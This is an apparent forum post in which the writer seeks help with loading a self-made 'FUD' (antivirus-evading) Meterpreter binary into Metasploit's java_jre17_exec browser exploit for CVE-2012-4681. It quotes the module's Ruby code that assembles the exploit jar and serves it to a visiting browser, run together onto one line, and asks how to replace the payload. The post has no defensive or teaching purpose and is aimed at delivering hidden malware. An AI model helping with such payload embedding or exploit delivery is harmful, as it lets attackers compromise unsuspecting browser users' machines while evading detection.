java_jre17_exec custom applet
Hello BT!
I'm trying to use java_jre17_exec with an applet having my custom exe meterpreter payload.
I've generated a FUD meterpreter binary and I want to embed it into a jar so I could use it with java_jre17_exec.
Here's the exploit:
The interesting lines are:Code:/opt/metasploit/msf3/modules/exploits/multi/browser/java_jre17_exec.rb
I think "jar.pack" is the final result.Code:p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '') end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close #jar.each do |num| --------- tried to see what does the jar array contain, but it doesen't show up in the console. am i doing it wrong? #puts num #end end print_status("Sending Applet.jar") send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end
So I have two options:
1)Have the "p" variable on the first line carry my custom binary, but I don't know which format "regenerate_payload()" accepts;
2)Create my own jar and replace it with "jar.pack".
Do you have some ideas?
Thanks.
